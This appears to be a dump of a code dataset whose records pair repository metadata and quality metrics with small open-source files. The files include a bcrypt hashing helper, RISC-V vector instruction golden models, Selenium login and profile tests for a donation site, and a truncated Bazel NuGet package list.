| 5.535253
| 0.048962
| 0.088349
| 0.074621
| 0.030252
| 0.922372
| 0.902275
| 0.878074
| 0.861763
| 0.84347
| 0.805718
| 0
| 0.0047
| 0.207809
| 42,438
| 786
| 292
| 53.992366
| 0.835986
| 0.323248
| 0
| 0.684211
| 1
| 0
| 0.151143
| 0.091144
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166316
| false
| 0.002105
| 0.014737
| 0.006316
| 0.284211
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
78eff3d7c52b09cbd98146b1731f20c92237288b
| 215
|
py
|
Python
|
em2/auth/utils.py
|
samuelcolvin/em2
|
a587eaa80c09a2b44d9c221d09a563aad5b05d78
|
[
"MIT"
] | 5
|
2019-03-20T19:07:45.000Z
|
2020-10-03T01:16:05.000Z
|
em2/auth/utils.py
|
samuelcolvin/em2
|
a587eaa80c09a2b44d9c221d09a563aad5b05d78
|
[
"MIT"
] | 51
|
2019-03-12T16:19:46.000Z
|
2021-03-09T00:52:24.000Z
|
em2/auth/utils.py
|
samuelcolvin/em2
|
a587eaa80c09a2b44d9c221d09a563aad5b05d78
|
[
"MIT"
] | 1
|
2019-05-31T14:41:18.000Z
|
2019-05-31T14:41:18.000Z
|
import bcrypt
from em2.settings import Settings
def mk_password(password: str, settings: Settings) -> str:
    """
    Hash *password* with bcrypt and return the hash as a UTF-8 string.

    A fresh salt is generated per call with the work factor taken from
    ``settings.bcrypt_work_factor``, so hashing the same password twice
    yields different outputs; verify with ``bcrypt.checkpw``.
    """
    return bcrypt.hashpw(password.encode(), bcrypt.gensalt(rounds=settings.bcrypt_work_factor)).decode()
| 26.875
| 104
| 0.781395
| 28
| 215
| 5.892857
| 0.607143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005208
| 0.106977
| 215
| 7
| 105
| 30.714286
| 0.854167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.5
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
|
0
| 7
|
6009f000814753ab436278e2d2cc38e961e80f3f
| 118
|
py
|
Python
|
networkx/algorithms/link_analysis/__init__.py
|
marscher/networkx
|
2b01a30d6967cc94a0f8caca2252bce7817b2b1c
|
[
"BSD-3-Clause"
] | 2
|
2022-01-19T02:07:57.000Z
|
2022-01-20T16:22:15.000Z
|
networkx/algorithms/link_analysis/__init__.py
|
Reed-CompBio/networkx
|
c266c4b29699290333dff5440e3c9e3029ec0341
|
[
"BSD-3-Clause"
] | null | null | null |
networkx/algorithms/link_analysis/__init__.py
|
Reed-CompBio/networkx
|
c266c4b29699290333dff5440e3c9e3029ec0341
|
[
"BSD-3-Clause"
] | 1
|
2022-02-03T09:38:16.000Z
|
2022-02-03T09:38:16.000Z
|
from networkx.algorithms.link_analysis.hits_alg import *
from networkx.algorithms.link_analysis.pagerank_alg import *
| 39.333333
| 60
| 0.864407
| 16
| 118
| 6.125
| 0.5625
| 0.244898
| 0.44898
| 0.530612
| 0.693878
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067797
| 118
| 2
| 61
| 59
| 0.890909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
60207f8a49b47fbcf85522f04e9cb01dce580ee8
| 95
|
py
|
Python
|
src/python/math_fun/lib/math.py
|
jaximan/pexample
|
8820e82b01b4ef84746351ddf2e1c8af1ff6b0a1
|
[
"Apache-2.0"
] | 17
|
2017-12-28T18:05:53.000Z
|
2022-03-07T09:45:40.000Z
|
src/python/math_fun/lib/math.py
|
jaximan/pexample
|
8820e82b01b4ef84746351ddf2e1c8af1ff6b0a1
|
[
"Apache-2.0"
] | null | null | null |
src/python/math_fun/lib/math.py
|
jaximan/pexample
|
8820e82b01b4ef84746351ddf2e1c8af1ff6b0a1
|
[
"Apache-2.0"
] | 2
|
2017-12-28T17:14:17.000Z
|
2020-03-25T17:46:37.000Z
|
import numpy as np
def random_sum(*dimensions):
    """Draw a uniform [0, 1) array with the given shape and return its sum."""
    samples = np.random.rand(*dimensions)
    return samples.sum()
| 15.833333
| 44
| 0.726316
| 14
| 95
| 4.857143
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.147368
| 95
| 5
| 45
| 19
| 0.839506
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
605d3355ade13da0e6d1e8abca4f445efda9ee05
| 115
|
py
|
Python
|
labelbox/data/annotation_types/data/__init__.py
|
nickaustinlee/labelbox-python
|
45eb808165849e5a55fb6869ca5cc415d74772ce
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
labelbox/data/annotation_types/data/__init__.py
|
nickaustinlee/labelbox-python
|
45eb808165849e5a55fb6869ca5cc415d74772ce
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
labelbox/data/annotation_types/data/__init__.py
|
nickaustinlee/labelbox-python
|
45eb808165849e5a55fb6869ca5cc415d74772ce
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
from .raster import ImageData
from .raster import MaskData
from .text import TextData
from .video import VideoData
| 23
| 29
| 0.826087
| 16
| 115
| 5.9375
| 0.5625
| 0.210526
| 0.336842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.13913
| 115
| 4
| 30
| 28.75
| 0.959596
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
606a151c1009f225adc5aacf1ad386960edc6735
| 329
|
py
|
Python
|
icontact/tests/__init__.py
|
rochapps/django-icontact
|
ba50b5a66d6ed179793fb460ee6cf4d242d46276
|
[
"BSD-3-Clause"
] | 1
|
2015-03-31T14:33:06.000Z
|
2015-03-31T14:33:06.000Z
|
icontact/tests/__init__.py
|
rochapps/django-icontact
|
ba50b5a66d6ed179793fb460ee6cf4d242d46276
|
[
"BSD-3-Clause"
] | null | null | null |
icontact/tests/__init__.py
|
rochapps/django-icontact
|
ba50b5a66d6ed179793fb460ee6cf4d242d46276
|
[
"BSD-3-Clause"
] | null | null | null |
from icontact.tests.client import IContactClientTests
from icontact.tests.adapter import IContactDataTests
from icontact.tests.adapter import IContactAdapterTests
from icontact.tests.models import IContactManagerTests
from icontact.tests.models import IContactModelTests
from icontact.tests.observer import IContactObserverTests
| 47
| 57
| 0.890578
| 36
| 329
| 8.138889
| 0.388889
| 0.245734
| 0.348123
| 0.163823
| 0.40273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072948
| 329
| 6
| 58
| 54.833333
| 0.960656
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
608d5ce46221662958076af811b187e85685de12
| 1,581
|
py
|
Python
|
rvpvp/isa/rvv/vmxxx_vvm.py
|
ultrafive/riscv-pvp
|
843e38422c3d545352b955764927d5e7847e5453
|
[
"Unlicense"
] | 5
|
2021-05-10T09:57:00.000Z
|
2021-10-05T14:39:20.000Z
|
rvpvp/isa/rvv/vmxxx_vvm.py
|
ultrafive/riscv-pvp
|
843e38422c3d545352b955764927d5e7847e5453
|
[
"Unlicense"
] | null | null | null |
rvpvp/isa/rvv/vmxxx_vvm.py
|
ultrafive/riscv-pvp
|
843e38422c3d545352b955764927d5e7847e5453
|
[
"Unlicense"
] | 1
|
2021-05-14T20:24:11.000Z
|
2021-05-14T20:24:11.000Z
|
from ...isa.inst import *
import numpy as np
class Vmadc_vvm(Inst):
    """
    Golden model for the RVV `vmadc.vvm` instruction.

    For each active element, computes vs2[i] + vs1[i] + v0.mask[i] in
    arbitrary precision and writes the carry-out bit (bit `sew` of the sum)
    into the destination mask register.
    """
    name = 'vmadc.vvm'
    # vmadc.vvm vd, vs2, vs1, v0

    def golden(self):
        """Return the packed destination mask bytes (or 'ori' unchanged when vl==0)."""
        if self['vl'] == 0:
            return self['ori']
        # Reinterpret the original destination buffer as raw bytes in place so
        # individual mask bits can be unpacked and repacked below.
        if self['ori'].dtype != np.uint8:
            self['ori'].dtype = np.uint8
        bit = np.unpackbits(self['ori'], bitorder='little')[0:8*self['bvl']]
        mask = np.unpackbits(self['mask'], bitorder='little')
        vstart = self['vstart'] if 'vstart' in self else 0
        for ii in range(vstart, self['vl']):
            # .astype(object) promotes to Python ints so the sum never wraps.
            carry = self['vs2'][ii].astype(object) + self['vs1'][ii].astype(object) + mask[ii].astype(object)
            bit[ii] = 1 if ((carry >> self['sew']) & 1) else 0
        result = np.packbits(bit, bitorder='little')
        return result
class Vmsbc_vvm(Inst):
    """
    Golden model for the RVV `vmsbc.vvm` instruction.

    For each active element, computes vs2[i] - vs1[i] - v0.mask[i] in
    arbitrary precision and writes the borrow-out bit (bit `sew` of the
    difference) into the destination mask register.
    """
    name = 'vmsbc.vvm'
    # vmsbc.vvm vd, vs2, vs1, v0

    def golden(self):
        """Return the packed destination mask bytes (or 'ori' unchanged when vl==0)."""
        if self['vl'] == 0:
            return self['ori']
        # Reinterpret the original destination buffer as raw bytes in place so
        # individual mask bits can be unpacked and repacked below.
        if self['ori'].dtype != np.uint8:
            self['ori'].dtype = np.uint8
        bit = np.unpackbits(self['ori'], bitorder='little')[0:8*self['bvl']]
        mask = np.unpackbits(self['mask'], bitorder='little')
        vstart = self['vstart'] if 'vstart' in self else 0
        for ii in range(vstart, self['vl']):
            # .astype(object) promotes to Python ints so the subtraction never wraps.
            carry = self['vs2'][ii].astype(object) - self['vs1'][ii].astype(object) - mask[ii].astype(object)
            bit[ii] = 1 if ((carry >> self['sew']) & 1) else 0
        result = np.packbits(bit, bitorder='little')
        return result
| 40.538462
| 110
| 0.536369
| 214
| 1,581
| 3.953271
| 0.224299
| 0.066194
| 0.099291
| 0.066194
| 0.865248
| 0.865248
| 0.865248
| 0.865248
| 0.865248
| 0.865248
| 0
| 0.02467
| 0.2821
| 1,581
| 38
| 111
| 41.605263
| 0.720705
| 0.034788
| 0
| 0.727273
| 0
| 0
| 0.097304
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.060606
| false
| 0
| 0.060606
| 0
| 0.363636
| 0.030303
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
609d48ef9cbb96154eaf89ea87cde1b7e4a94abf
| 11,743
|
py
|
Python
|
tests/test_gui.py
|
COE420Group4/Donation-Nation
|
58d62bc3a28aba0ce2b484ad68329ac0bd0680f2
|
[
"MIT"
] | null | null | null |
tests/test_gui.py
|
COE420Group4/Donation-Nation
|
58d62bc3a28aba0ce2b484ad68329ac0bd0680f2
|
[
"MIT"
] | null | null | null |
tests/test_gui.py
|
COE420Group4/Donation-Nation
|
58d62bc3a28aba0ce2b484ad68329ac0bd0680f2
|
[
"MIT"
] | null | null | null |
import pytest
import time
import json
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.chrome.options import Options
import sys # ! Don't remove this line.
sys.path.append('.')
from db import DB
# * This is a suite of tests to test functionality that relates to the GUI (alerts exists, buttons are clickable, etc)
class TestGUI():
def setup_method(self, method):
self.sql = DB()
self.sql.clear_db()
self.sql.init_db()
self.sql.populate()
chrome_options = Options()
chrome_options.add_argument("--headless")
self.driver = webdriver.Chrome(options=chrome_options)
self.vars = {}
def teardown_method(self, method):
self.driver.quit()
# * User login
def test_user_valid_credentials(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(1) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("donald@email.com")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
self.driver.find_element(By.CSS_SELECTOR, ".btn-primary").click()
assert 'Dashboard' in self.driver.title
def test_user_invalid_credentials(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(1) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("donald@email.com")
self.driver.find_element(By.ID, "exampleInputPassword1").click()
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("b")
self.driver.find_element(By.CSS_SELECTOR, ".btn-primary").click()
assert 'Dashboard' not in self.driver.title
def test_user_logout(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(1) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("donald@email.com")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys(Keys.ENTER)
self.driver.find_element(By.ID, "logoutButton").click()
elements = self.driver.find_elements(By.CSS_SELECTOR, ".alert")
assert len(elements) > 0
# * Org login
def test_org_valid_credentials(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(2) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("contact@redcrescent.org")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys(Keys.ENTER)
assert "Dashboard" in self.driver.title
def test_org_invalid_credentials(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(2) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("contact@redcrescent.org")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("b")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys(Keys.ENTER)
assert "Dashboard" not in self.driver.title
def test_org_logout(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(2) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("contact@redcrescent.org")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys(Keys.ENTER)
self.driver.find_element(By.ID, "logoutButton").click()
elements = self.driver.find_elements(By.CSS_SELECTOR, ".alert")
assert len(elements) > 0
# * Viewing own profiles
def test_user_view_profile(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(1) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("rich@email.com")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys(Keys.ENTER)
self.driver.find_element(By.LINK_TEXT, "View Profile").click()
assert self.driver.find_element(By.CSS_SELECTOR, ".row:nth-child(3) > .col:nth-child(1) > p").text == "Richy"
def test_org_view_profile(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(2) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("contact@dubaicares.org")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys(Keys.ENTER)
self.driver.find_element(By.LINK_TEXT, "View Profile").click()
assert self.driver.find_element(By.CSS_SELECTOR, ".row:nth-child(3) > .col:nth-child(1) > p").text == "Dubai Cares"
# * Test listing organization
def test_viewOrganizationProfileAsUser(self):
self.driver.get("http://127.0.0.1:5000/")
self.driver.set_window_size(1200, 1000)
self.driver.find_element(By.ID, "loginButton").click()
self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(1) .img-fluid").click()
self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("donald@email.com")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
self.driver.find_element(By.ID, "exampleInputPassword1").send_keys(Keys.ENTER)
self.driver.find_element(By.CSS_SELECTOR, ".row:nth-child(2) > .col-md-4:nth-child(4) > .btn").click()
self.driver.find_element(By.LINK_TEXT, "View Profile").click()
assert self.driver.find_element(By.CSS_SELECTOR, ".display-1").text == "Red Crescent"
def test_viewOrganizationProfileLoggedOut(self):
    """Browse to an organization profile without logging in and check its heading."""
    drv = self.driver
    drv.get("http://127.0.0.1:5000/")
    drv.set_window_size(1200, 1000)
    # The Organizations page is reachable while logged out.
    drv.find_element(By.LINK_TEXT, "Organizations").click()
    drv.find_element(By.CSS_SELECTOR, ".card:nth-child(3) .btn").click()
    heading = drv.find_element(By.CSS_SELECTOR, ".display-1")
    assert heading.text == "UAE Aid"
# * Test editing own information
def test_testUserChangingInfo(self):
    """Edit a user's own profile (emirate dropdown + PO box) and verify the saved value.

    Fix: ``WebDriverWait`` takes its timeout in SECONDS, so the original
    ``30000`` meant roughly 8.3 hours before giving up; ``30`` seconds is
    the intended upper bound for the edit form to become interactive.
    """
    self.driver.get("http://127.0.0.1:5000/")
    self.driver.set_window_size(1200, 1053)
    self.driver.find_element(By.ID, "loginButton").click()
    # First tile on the login-type chooser = regular-user login.
    self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(1) .img-fluid").click()
    self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("jake@email.com")
    self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
    self.driver.find_element(By.CSS_SELECTOR, ".btn-primary").click()
    self.driver.find_element(By.LINK_TEXT, "View Profile").click()
    self.driver.find_element(By.LINK_TEXT, "Edit Profile").click()
    # Wait (up to 30 s) for the emirate dropdown on the edit form to be clickable.
    WebDriverWait(self.driver, 30).until(
        expected_conditions.element_to_be_clickable((By.ID, "validationTooltip04"))
    )
    self.driver.find_element(By.ID, "validationTooltip04").click()
    dropdown = self.driver.find_element(By.ID, "validationTooltip04")
    dropdown.find_element(By.XPATH, "//option[. = 'Dubai']").click()
    # Double-click selects the existing PO-box text so send_keys replaces it.
    element = self.driver.find_element(By.ID, "PO-BOX")
    actions = ActionChains(self.driver)
    actions.double_click(element).perform()
    self.driver.find_element(By.ID, "PO-BOX").send_keys("990099")
    self.driver.find_element(By.CSS_SELECTOR, "#edit .btn-primary").click()
    assert self.driver.find_element(
        By.CSS_SELECTOR, ".row:nth-child(8) > .col:nth-child(3) > p"
    ).text == "990099"
# ! These should always be last!
def test_testOrgChangingPassword(self):
    """Change an organization's password, then re-login with the new one.

    NOTE: mutates persistent state (the org's password), so it must run
    after tests that log in with the old password — see the marker comment
    above this test in the suite.

    Fix: ``WebDriverWait`` takes its timeout in SECONDS; the original
    ``30000`` (~8.3 hours) is replaced with the intended ``30`` seconds.
    """
    self.driver.get("http://127.0.0.1:5000/")
    self.driver.set_window_size(1200, 1000)
    self.driver.find_element(By.ID, "loginButton").click()
    # Second tile on the login-type chooser = organization login.
    self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(2) .img-fluid").click()
    self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("contact@redcrescent.org")
    self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
    self.driver.find_element(By.CSS_SELECTOR, ".btn-primary").click()
    self.driver.find_element(By.LINK_TEXT, "View Profile").click()
    # The change-password button sits at the bottom of the profile page.
    self.driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
    self.driver.find_element(By.CSS_SELECTOR, ".btn-primary:nth-child(1)").click()
    # Wait (up to 30 s) for the new-password field to become clickable.
    WebDriverWait(self.driver, 30).until(
        expected_conditions.element_to_be_clickable((By.ID, "validationTooltip07"))
    )
    self.driver.find_element(By.ID, "validationTooltip07").send_keys("b")
    self.driver.find_element(By.ID, "validationTooltip08").send_keys("b")
    self.driver.find_element(By.CSS_SELECTOR, ".btn:nth-child(2)").click()
    # Log out and verify the NEW password works.
    self.driver.find_element(By.ID, "logoutButton").click()
    self.driver.find_element(By.ID, "loginButton").click()
    self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(2) .img-fluid").click()
    self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("contact@redcrescent.org")
    self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("b")
    self.driver.find_element(By.CSS_SELECTOR, ".btn-primary").click()
    assert self.driver.find_element(By.ID, "intro").text == "Hello, Red Crescent!"
def test_testUserChangingPassword(self):
    """Change a user's password, then re-login with the new one.

    NOTE: mutates persistent state (the user's password), so it must run
    after tests that log in as this user with the old password.

    Fix: ``WebDriverWait`` takes its timeout in SECONDS; the original
    ``30000`` (~8.3 hours) is replaced with the intended ``30`` seconds.
    """
    self.driver.get("http://127.0.0.1:5000/")
    self.driver.set_window_size(1200, 1000)
    self.driver.find_element(By.ID, "loginButton").click()
    # First tile on the login-type chooser = regular-user login.
    self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(1) .img-fluid").click()
    self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("donald@email.com")
    self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("a")
    self.driver.find_element(By.CSS_SELECTOR, ".btn-primary").click()
    self.driver.find_element(By.LINK_TEXT, "View Profile").click()
    self.driver.find_element(By.CSS_SELECTOR, ".col-md-12 > .btn:nth-child(2)").click()
    # Wait (up to 30 s) for the new-password field to become clickable.
    WebDriverWait(self.driver, 30).until(
        expected_conditions.element_to_be_clickable((By.ID, "validationTooltip07"))
    )
    self.driver.find_element(By.ID, "validationTooltip07").send_keys("b")
    self.driver.find_element(By.ID, "validationTooltip08").send_keys("b")
    self.driver.find_element(By.CSS_SELECTOR, "#changePassword .btn-primary").click()
    # Log out and verify the NEW password works.
    self.driver.find_element(By.ID, "logoutButton").click()
    self.driver.find_element(By.ID, "loginButton").click()
    self.driver.find_element(By.CSS_SELECTOR, ".col-4:nth-child(1) .img-fluid").click()
    self.driver.find_element(By.ID, "exampleInputEmail1").send_keys("donald@email.com")
    self.driver.find_element(By.ID, "exampleInputPassword1").send_keys("b")
    self.driver.find_element(By.CSS_SELECTOR, ".btn-primary").click()
    self.driver.find_element(By.ID, "intro").click()
    assert self.driver.find_element(By.ID, "intro").text == "Hello, Donald!"
| 56.186603
| 118
| 0.752874
| 1,736
| 11,743
| 4.937212
| 0.106567
| 0.169175
| 0.176409
| 0.259713
| 0.825341
| 0.822891
| 0.822891
| 0.804924
| 0.786839
| 0.771205
| 0
| 0.033441
| 0.07562
| 11,743
| 209
| 119
| 56.186603
| 0.756149
| 0.023844
| 0
| 0.602151
| 0
| 0.021505
| 0.246268
| 0.058839
| 0
| 0
| 0
| 0
| 0.069892
| 1
| 0.080645
| false
| 0.134409
| 0.069892
| 0
| 0.155914
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
60adee835337db8004368a1f0ef4d70ea3646b4a
| 77,807
|
bzl
|
Python
|
csharp/nuget/packages.bzl
|
kalbasit/rules_proto_grpc
|
7e0a97adc8801df1cd74ee435d74bbd857c98a36
|
[
"Apache-2.0"
] | 1
|
2021-08-11T23:14:07.000Z
|
2021-08-11T23:14:07.000Z
|
csharp/nuget/packages.bzl
|
kalbasit/rules_proto_grpc
|
7e0a97adc8801df1cd74ee435d74bbd857c98a36
|
[
"Apache-2.0"
] | 1
|
2020-04-06T12:24:52.000Z
|
2020-04-06T12:24:52.000Z
|
csharp/nuget/packages.bzl
|
kalbasit/rules_proto_grpc
|
7e0a97adc8801df1cd74ee435d74bbd857c98a36
|
[
"Apache-2.0"
] | 1
|
2020-02-03T20:31:13.000Z
|
2020-02-03T20:31:13.000Z
|
load("@io_bazel_rules_dotnet//dotnet:defs.bzl", "net_gac4", "nuget_package")
def packages():
nuget_package(
name = "npgsql",
package = "npgsql",
version = "4.0.3",
# sha256 = "4e1f91eb9f0c3dfb8e029edbc325175cd202455df3641bc16155ef422b6bfd6f",
core_lib = {
"netstandard2.0": "lib/netstandard2.0/Npgsql.dll",
},
net_lib = {
"net451": "lib/net451/Npgsql.dll",
},
mono_lib = "lib/net45/Npgsql.dll",
core_deps = {},
net_deps = {},
mono_deps = [],
core_files = {
"netstandard2.0": [
"lib/netstandard2.0/Npgsql.dll",
"lib/netstandard2.0/Npgsql.pdb",
"lib/netstandard2.0/Npgsql.xml",
],
},
net_files = {
"net451": [
"lib/net451/Npgsql.dll",
"lib/net451/Npgsql.pdb",
"lib/net451/Npgsql.xml",
],
},
mono_files = [
"lib/net45/Npgsql.dll",
"lib/net45/Npgsql.pdb",
"lib/net45/Npgsql.xml",
],
)
net_gac4(
name = "System.ComponentModel.DataAnnotations",
version = "4.0.0.0",
token = "31bf3856ad364e35",
)
### Generated by the tool
nuget_package(
name = "commandlineparser",
package = "commandlineparser",
version = "2.3.0",
core_lib = {
"netcoreapp2.0": "lib/netstandard1.5/CommandLine.dll",
"netcoreapp2.1": "lib/netstandard1.5/CommandLine.dll",
},
net_lib = {
"net45": "lib/net45/CommandLine.dll",
"net451": "lib/net45/CommandLine.dll",
"net452": "lib/net45/CommandLine.dll",
"net46": "lib/net45/CommandLine.dll",
"net461": "lib/net45/CommandLine.dll",
"net462": "lib/net45/CommandLine.dll",
"net47": "lib/net45/CommandLine.dll",
"net471": "lib/net45/CommandLine.dll",
"net472": "lib/net45/CommandLine.dll",
"netstandard1.5": "lib/netstandard1.5/CommandLine.dll",
"netstandard1.6": "lib/netstandard1.5/CommandLine.dll",
"netstandard2.0": "lib/netstandard1.5/CommandLine.dll",
},
mono_lib = "lib/net45/CommandLine.dll",
net_deps = {
"net461": [
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.collections.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.console.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.diagnostics.debug.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.globalization.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.io.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.linq.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.linq.expressions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.reflection.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.reflection.extensions.dll",
"@io_bazel_rules_dotnet//dotnet/stdlib.net:net461_system.reflection.typeextensions.dll",
